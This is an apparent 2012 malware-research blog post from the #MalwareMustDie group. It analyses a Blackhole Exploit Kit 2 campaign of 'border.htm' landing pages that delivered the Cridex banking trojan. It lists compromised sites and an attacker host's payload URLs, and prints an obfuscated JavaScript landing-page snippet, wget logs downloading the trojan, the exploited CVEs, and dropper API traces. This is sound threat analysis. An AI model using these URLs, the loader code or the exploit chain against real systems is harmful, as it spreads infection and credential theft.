Monday, October 22, 2012

(Updated) A tale of mass infection of BHEK2 "border.htm" during ddos storm - Changes in JAR detected - Payload : Cridex - Malware Crusaders Logs

This post is dedicated to the wonderful individuals, came from varied countries and cultures, gathered to be together to push infection of malware down to the very minimum level of infection by agressively researching new infections during their rest/private time in weekends. This is the story of #MalwareMustDie, the malware crusaders with its Team Work Report:

It is a quicky, and since the bad guys is also monitoring us now I'll make it short. Found new update of BHEK2 trends. In the past 2days during ddos storm these landing pages NEW infections had appeared, a large infections of border.htm files has been spotted everywhere. Storms made us slow in detecting these, by the time we found it the infection was already deep spreaded, it was at the time we decided to end the last crusade. So this is the last battle's report:

h00p://regioneconomrazvitie.ru/border.htm  
h00p://alfa-opora.ru/border.htm
h00p://brandonchurch.ca/border.htm
h00p://carobnoselo.co.rs/border.htm
h00p://downendchristadelphians.org.uk/border.htm
h00p://dstamac.com/border.htm
h00p://hopsshack.com/border.htm
h00p://kotkankoiraystavainseura.fi/border.htm
h00p://ncrg.info/border.htm
h00p://orejitassanas.com/border.htm
h00p://techjamcincinnati.org/border.htm
h00p://www.binarius.pt/border.htm
h00p://www.burghotel-bad-belzig.de/border.htm
h00p://www.eetrans.ru/border.htm
h00p://www.kulich.hu/border.htm
h00p://www.mvlcs.org/border.htm
h00p://www.partylooxx.nl/border.htm
h00p://www.resgroup.com/border.htm
h00p://www.ribon.ro/border.htm
h00p://www.rzua.org/border.htm
h00p://www.s-a-n.nl/border.htm
h00p://www.schwabinger-ernaehrungsstudio.de/border.htm
h00p://www.su-woerschach.at/border.htm
h00p://www.szhuaheng.com/border.htm
h00p://www.usv-gaweinstal.at/border.htm
h00p://центрцен.рф/border.htm
With some formula we can grab all samples w/o problems:
--23:12:50--  h00p://secondhand4u.ru:8080/forum/links/column.php
           => `column.php'
Resolving secondhand4u.ru... 209.51.221.247, 72.18.203.140, 203.80.16.81
Connecting to secondhand4u.ru|209.51.221.247|:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 14:08:38 GMT
Content-Type: text/html; charset=CP-1251
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Via: 1.0 localhost (squid/3.1.6)
Proxy-Connection: close
Length: unspecified [text/html]
23:12:53 (49.74 KB/s) - `column.php' saved [28835]
File looks like:
$ ls -alF column.php
-rwx------   1 malware mustdie    28835 Oct 21 05:12 column.php*
The data itself contains malc0de as below snips:
<html><head><title></title></head><body><div dqa="
665b686966^621e5c6h6h_6h6h665b68$6966621e62(696060
25#2a5b6c5b59*2458253462!6960603566^5b68696662_1e5
63!62685b6c68^252525256f_5f5c241f5h$6g6g1f245h(2a6
2c6h6h#354860695" 57="96268+37586h5f5c%245829612a)
  :
  :
85b$625b66245a(2859285c57@60675b256h&5b60675b6f+5f
58&2a5a5" 8="362595768$24511g2c1g(281g2c1g28@1g2c1
$25512c536g(6g5g2a5863@5a6d25355f&5c245d256f+5f5c2
a245725#256f57371g*1g6h5f5c24!5h2a5f674b^68665f625
43d3b32!3b3331322c^292e322c3e_2" 16="725256f@5f5c2
2a665b)575a6d4b68#57685b3737*2g25256f5f!5c241f612a
5b62^5d685e2222_592a4f445c$6962596751(592a4f445c@6
if(window.document){if(021==0x11)d=window.document
try{asd3*f2}catch(dsgdsg){a=d[g](ggg);}
s="";
for(i=0;;i++){
 asd2();
 if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x12;
for(i=0;i<a.length;i+=2){
 asd5();
}
asd();}
  </script></body></html>
With the hexed complete data is here:--->>[PASTEBIN]
As usual it can be deobfs into PluginDetect here:--->>[PASTEBIN]
Which can alternatively be decoded manually like this:---->>[PASTEBIN]

Shortly, this border.htm infections case are using same PluginDetect which infection of Cridex
(we thought was Zbot) with the below steps :

1. Lead to h00p://secondhand4u[.]ru:8080/forum/links/column[.]php
2. Using function (c, b, a) + catching these parameters for Exploits = {d,f,h,m.i.e}
3. Makes you downloads exploit PDF(CVE-2010-0188) & jar component. jar exploits with CVE-2012-0507, flooding AtomicReferenceArray & using cracking singleton method to bypass JRE environment (used IllegalArgumentException, SecurityException, InstantiationException,etc) and push url download command to download a trojan dropper, Our PoC during analyzing jar code is as per snipped below:
IMPORTANT NOTE: This Jar infection marks the first time the BHEK authors have used two forms of obfuscation in the param value field.
The full details of JAR decoded is in here:-->>[MMDCrackTeamBlog] Through PDF & JAR exploits downloads trojan/dropper "via" below urls forms:
(there's a direct download link too but sorry we're not going to expose it here..)
h00p://secondhand4u.ru:8080/forum/links/column.php?hqc=350a050538&pcxii=3307093738070736060b&nkwrjmje=04&dpgqcro=ebsvhag&avw=qxkszjzu
h00p://secondhand4u.ru:8080/forum/links/column.php?sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03&vjydansz=ctqdpz&jdrht=jkdu
h00p://secondhand4u.ru:8080/forum/links/column.php?zf=3436353638&oe=3307093738070736060b&n=02&re=e&mk=k

Not only PDF/JAR, PluginDetect will hit you with CVE-2006-0003 (MDAC) w/ActiveX Object : BD96C556-65A3-11D0-983A-00C04FC29E36 to drop trojan malware via msxml2.XMLHTTP to your PC with API: SaveToFile .//..//SOMETHING.exe) As you can see, a triple hit exploit, to same Cridex payload.

4. ↑that PDF and Jar files we post in VT is as per below VT details:

Jar: https://www.virustotal.com/file/c24b87d6580b21e39f744a77babdd317d5aa8a94bdadeb5edde9f018a50fb093/analysis/
PDF: https://www.virustotal.com/file/ed3ae7ef961218a165c3fda730d88d871fe0f0a00693958f3bdc4f55cdef03c6/analysis/
5. You will get exploited by above details & brings you to saved trojan in exe file as, per below PoC:
--01:04:06--  h00p://secondhand4u.ru:8080/forum/links/column.php?sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03&vjydansz=ctqdpz&jdrht=jkdu
           => `column.php@sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03
&vjydansz=ctqdpz&jdrht=jkdu'
Resolving secondhand4u.ru... 72.18.203.140, 203.80.16.81, 209.51.221.247
Connecting to secondhand4u.ru|72.18.203.140|:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 22:43:38 GMT
Content-Type: application/x-msdownload
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 14:22:22 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040
Connection: close
Length: 87,040 (85K) [application/x-msdownload]
100%[====================================>] 87,040       108.56K/s
01:04:10 (108.42 KB/s) - `calc.exe' saved [87040/87040]

VT shows:

MD5: 8e4e7c4bb9908a9488a1be96c5eb230f File size: 85.0 KB ( 87040 bytes ) File name: calc.exe File type: Win32 EXE Tags: peexe Detection: 29 / 43 Date: 2012-10-21 15:17:14 UTC ( 55 分 ago ) URL: https://www.virustotal.com/file/05bc5c346488c55fe91b80dea9dc7ef3c66210b9f4981918b6623ba3c3518bf6/analysis/

6. Dropped/Self Copied Trojan:
It dropped itself and saved it in %AppData% folder.
Dropper & Memory Inject API / Reversing + Behavior PoC is:

(1) PID: 0x4ac 
File: C:\calc.exe 
Address: 0x4079ce 
CopyFileW(
   lpExistingFileName: "C:\calc.exe", 
   lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
   bFailIfExists: 0x0);
   
(2) PID: 0x674 
File: C:\Documents and Settings\User\Application Data\KB00085031.exe" 
Address:   0x403822 
CreateRemoteThread
   (hProcess: 0x78, 
   lpThreadAttributes: 0x0, 
   dwStackSize: 0x0, 
   lpStartAddress: 0xe5eca0, 
   lpParameter: 0xe50000, 
   dwCreationFlags: 0x0, 
   lpThreadId: 0x0);
PS: original PE sample also self-deleted.

The dropped Trojan (payload) is :

MD5: e86d8403f74bd18de027996abae4156a File size: 84.5 KB ( 86528 bytes ) File name: KB01428194.exe File type: Win32 EXE Tags: peexe Detection: 9 / 43 Date: 2012-10-21 14:48:59 UTC ( 1 時間, 26 分 ago ) URL: https://www.virustotal.com/file/4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb/analysis/1350830939/

According to the new feature "Behavioutal Information" of VT, this payload trojan did:

Written files...
  C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)

Copied files...
  SRC: C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb
  DST: C:\Documents and Settings\\Application Data\KB00927107.exe (successful)

Deleted files...
  C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb (successful)
  C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)

Created processes...
  C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat"" (successful)
  C:\Documents and Settings\\Application Data\KB00927107.exe (successful)

Code injections in the following processes...
  python.exe (successful)
  VBoxTray.exe (successful)
We just finished full behavior test of the dropped Trojan, PoC:


7. The network analysis can be seen here:--->>[PASTEBIN]
With the summary as per below: 
7.1. It requested handshake to 3(three) remote IP: 188.40.0.138 203.217.147.52 and 41.168.5.140 // I tried this 5 times, same pattern.. no miss.. 7.2. It established connection with 41.168.5.140 7.3. Send POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 contains encryption. 7.4. See below for the sample of each unique packet we trapped (Suspected crypted credentials on outgoing packets
8. The registry analysis can be seen here: --->>[PASTEBIN] With the summary as per below:
8.1. Autorun of the dropped trojan 8.2. Cannot expose further yet but many chipers are registered. 8.8. Suspected screenshot templates detected:
..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
     :
9. The CNC was solved as per this report:--->>[PASTEBIN] by our member :-)
(additional) According to Contagio is a Cridex: (thanks to @snowfl0w)

As the trophy of the current findings is the head of these malwares as per - below family pic:-)

We are also requested the sample of the current infections by researchers.
Contagio looks busy, so you can download here:--->>[SAMPLE-SET]
(Mention us in twitter for password request)

Cridex Reference: M86 - The Cridex Trojan Targets 137 Financial Organizations in One Go Stop Malvertising - Analysis of Cridex DeepEnd Research - Blackhole & Cridex: Se2 Ep1: Intuit Spam & SSL traffic analysis Contagio - Cridex Analysis using Volatility - by Andre' DiMino Kahu Security - Spear-Phish Leads to Cridex #MalwareMustDie!